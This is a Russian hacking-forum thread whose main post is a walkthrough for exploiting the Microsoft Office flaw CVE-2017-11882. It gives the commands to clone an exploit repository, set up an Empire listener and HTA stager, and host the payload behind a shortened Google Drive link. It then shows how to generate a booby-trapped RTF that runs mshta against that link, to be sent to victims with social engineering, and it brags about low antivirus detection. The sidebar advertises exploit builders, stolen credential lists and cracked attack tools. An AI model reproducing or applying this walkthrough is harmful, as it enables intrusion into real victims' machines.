CVE-2017-11882 или Взлом с помощью безобидного документа

Forevonly

Original poster
Pro Member
Сообщения
599
Реакции
601
Посетить сайт
Всем привет. Сегодня хочу показать Вам эксплоит, с помощью которого мы получим доступ к целевой машине.

Коротко и по делу:

Создаем файл в формате RTF с вызовом функции командной строки mshta , которая позволит вызвать powershell с помощью HTA файла, расположенного на удаленном сервере.

Поехали!

Источник :

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Установка :
Код:
git clone https://github.com/Ridter/CVE-2017-11882
cd CVE-2017-11882
chmod +x Command109b_CVE-2017-11882.py
chmod +x Command43b_CVE-2017-11882.py


На этом все.



Теперь создадим HTA файл с помощью [Empire] Post-Exploitation Framework

Источник :

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.






Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.




Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Собственно говоря, поехали:



Listeners у меня уже есть, что бы их создать, проделаем :

listeners

uselistener http

Далее заполняем нужные поля с помощью set

Пример : set Name http - задать имя листенера http

set Host ip - пишем айпишник куда стучаться вистиму

set Port номер порта - пишем на какой порт стукать

execute - выполнить, создать



Далее у вас появится листенер. Можно вернутся в главное меню с помощью: main

7b281a75e1d3eea61d7f7.png

Создание HTA

5b57ce44ca695bb4f5d74.png

usestager windows/hta - использовать модуль

info - посмотреть инфу и обычно заполнить Listener

set Listener http (у меня так называется листенер "http")

set OutFile /tmp/hack1.hta - путь к сохранению файла и название

execute - генерим и получаем на выходе

be80edfdd26dce183bb66.png

Далее идем в папочку /tmp берем этот файлик и заливаем на любой файлообменник. К примеру Google Drive.

623e5d19b9234c6a5bc17.png

Далее включаем доступ на скачивание всем у кого есть ссылка. Копируем ссылку и переходим по ней :

096e73ca582adfd86edd0.png

425c8e786482903872f77.png

Здесь копируем ссылку на скачивание файла и идем к любому сервису по сокращению ссылок. Я предпочел гугловский:

a7d0830cdc7de5102fe3f.png

Копируем это батву, идем в каталог где мы установили софт. У меня это :

Код:
cd CVE-2017-11882
Здесь исполняем следующее :
Код:
python Command109b_CVE-2017-11882.py -c "mshta сюда вставить сокращенную ссылку" -o codeby.rtf


7d83c95031c3bf297e2b5.png

Файл создан в формате rft. Почему так, объясню в конце статьи. Далее отправляем потенциальному клиенту.. ) Уж тут кто что придумает, в помощь СИ) И после запуска файла видим следующую картину )

28139bc968fc53aaf14d2.png

YEAAH! PROF1t! Теперь на машине, которая запустила файл в процессах появится наш родимый и неповторимый PowerShell, а значит Мы в системе, тому свидетельствуем подключение агента в империи ) Далее делаем чего душе угодно. В Империи куча фичей прикольных, в том числе и трольских)



Дополнительная информация : Почему RTF? Почему не DOC? Дело в том, что я часа 2 убил на то, что бы тестировать файлы док. Тестируемая машина вин 10 с 16тым офисом, запускал и ничего не происходило. Долго не мог понять что такое, да и забил. Создал в ртф и просто супер. Никаких проблем. Запускается файл, далее вылазит обычное окошко " разрешить редактирование файла " это никакое не предупреждение безопасности как в макросах, это банальщина и ничего в себе таинственного она не несет. После разрешения редактирования мигает окошко ПоверШелл и все, система завоевана.



Как обстоят дела с обнаружением ? Тут дело такое, первый раз когда создал, видел только Касперыч. Буквально через несколько часов еще парочка. И того 3, из них самый распространенный Касперский.


По мне так очень даже хорошие показатели. Способ довольно простой, не требует особых хацких навыков. Всем профит!
 

Major1

Pro Member
Сообщения
85
Реакции
33
Посетить сайт
Как понял я,форум обновляется,но зачем тогда былое заливать. Если не ошибаюсь,где то октяб нояб 17 года))
 
Название темы
Автор Заголовок Раздел Ответы Дата
1 CVE-2017-0199 Spam/DDOS/Malware 0
Forevonly Уязвимость Microsoft Office CVE-2017-8570 Kali Linux 0
TarasGyska VMware Escape Exploit, CVE-2017-4901 Уязвимости и взлом 0
Admin Тестирования уязвимости в продукции Microsoft Office - CVE-2017-0199 Уязвимости и взлом 0
D Office CVE-2021-40444 remote code execution native builder Продажа софта 0
pw0ned CUPS Remote Code Execution exploit (CVE-2015-1158) Уязвимости и взлом 0
barracudafs Сколько можно было заработать на одном биткоине с 2017 года Новости в сети 0
B Joomla-Ученик 12 фишек без которых Вы гарантированно не создадите полноценный сайт на Joomla 9 (2017) Полезные статьи 0
G Продам ПРОДАМ БАЗУ MAIL:PASS НЕ ИСПОЛЬЗОВАННАЯ ДЕКАБРЬ 2017 Доступы - FTP, shell'ы, руты, sql-inj, БД 0
VipRin1 [Udemy.com] Изучаем Социальную Инженерию с Нуля 2017 (все части) Полезные статьи 5
kdroshev Социальная уверенность (2017)Автор: Патрик Кинг Другое 0
kdroshev Курс по сайтостроению 2017, на основе премиум шаблона для WordPress "AVADA" (Шаблон прилагается) Другое 0
kdroshev [Udemy.com] Полный курс по кибербезопасности Секреты хакеров! [2017] Часть 1,2,3,4,5,6,7,8 Другое 0
kdroshev TheBrain - ваша персональная база знаний (2017) Другое 0
kdroshev Современный JavaScript Полный курс - Построим 10 проектов - Udemy (2017) Другое 0
kdroshev Вебинар Взлом социальной сети (2017) Раздача dedic/ssh/proxy 8
kdroshev Пак курсов Нетологии за 2017-2018 годы Другое 0
kdroshev Мегапак шаблонов и плагинов для Wordpress и Woocommerce(2017) https://cloud.mail.ru/public/8J47/yCR2BqM2D/ Другое 0
hiller1234 MIX Ап за 2017 654 мб Раздача email 0
V Слив интенсива по товарному бизнесу 2017 от Белого, Попова и Дунаева Другое 0
hiller1234 Удаление сообщений у себя и получателя ВКонтакте [14.12.2017] Новости в сети 0
NickelBlack Socks 5 fresh 01-17.2017 Раздача dedic/ssh/proxy 1
АнАлЬнАя ЧуПаКаБрА INLINE Рабочий обход CloudFlare для Private Keeper'a ( от 01.12.2017 ) Полезные статьи 0
HARD_RESET Socks5 [12915] [25.11.2017] [19:16] Раздача dedic/ssh/proxy 0
supiner BETPROFI 2017 !!! [CRACK] 19.11.17 Софт для работы с текстом/Другой софт 16
Ltb12263 Ddos with Kali Linix ZAmbIE 2017 Полезные статьи 1
samstigmat [Udemy] Полный курс по кибербезопасности: Секреты хакеров! [2017] Часть 2 из 8. Русский перевод Уязвимости и взлом 7
MRobot WIRESHARK: от начального до продвинутого уровня (2017) (WCNA) Уязвимости и взлом 11
E Zeus Botnet 5.0.0.1 [2017] Уязвимости и взлом 1
E DDOS по номеру телефона Атака звонками на телефон 2017 Полезные статьи 4
N SQLi Dumper All Full Version 9.2.1,9.2,8.5,8.2,8.0,7.0,5.1 Full Crack 2017 Софт для работы с текстом/Другой софт 3
Кракозябра Свежак прокси на 23.07.2017 Раздача dedic/ssh/proxy 1
Кракозябра Свежак прокси на 21.07.2017 Раздача dedic/ssh/proxy 1
Кракозябра Свежак прокси на 20.07.2017 Раздача dedic/ssh/proxy 4
impak Скрытая RMS сборка 2017. (Пропатченная) Софт от наших юзеров 3
Renelio Путь веб-разработчика в 2017 Другие ЯП 1
Renelio Лучший формат для резюме программиста в 2017 Другие ЯП 2
MrLeam1 VK Brute New - [Cracked By PC-RET] (03.05.2017) Бруты/Парсеры/Чекеры 0
АнАлЬнАя ЧуПаКаБрА Brute and Checker BIGLION 2017 Бруты/Парсеры/Чекеры 11
HARD_RESET [Tools] Text Utils byGuron v1.2 fix (2017.04.23) Софт для работы с текстом/Другой софт 1
E СПОСОБ! Удаляем чужую страницу Вконтакте 2017 Уязвимости и взлом 3
papich6terka VK Brute New - [Cracked By PC-RET] (07.03.2017) Бруты/Парсеры/Чекеры 8
TITLE [HTTP/S & Socks4/5] Свежие прокси на 06.03.2017 Раздача dedic/ssh/proxy 1
TITLE [HTTP/S & Socks4/5] Свежие прокси на 02.03.2017 Раздача dedic/ssh/proxy 0
TITLE [HTTP/S & Socks4/5] Свежие прокси на 01.03.2017 Раздача dedic/ssh/proxy 1
TITLE [HTTP/S & Socks4/5] Свежие прокси на 27.02.2017 Раздача dedic/ssh/proxy 2
TITLE [HTTP/S & Socks4/5] Свежие прокси на 26.02.2017 Раздача dedic/ssh/proxy 0
АнАлЬнАя ЧуПаКаБрА Молниеносное создание трафикового сайта для заработка за 1 день (Борисов 2017) Полезные статьи 0
Admin Бесконечные лайки инстаграм. баг инстаграм 2017. Полезные статьи 13
farhad.tiger 2017 mail/pass Раздача email 0

Название темы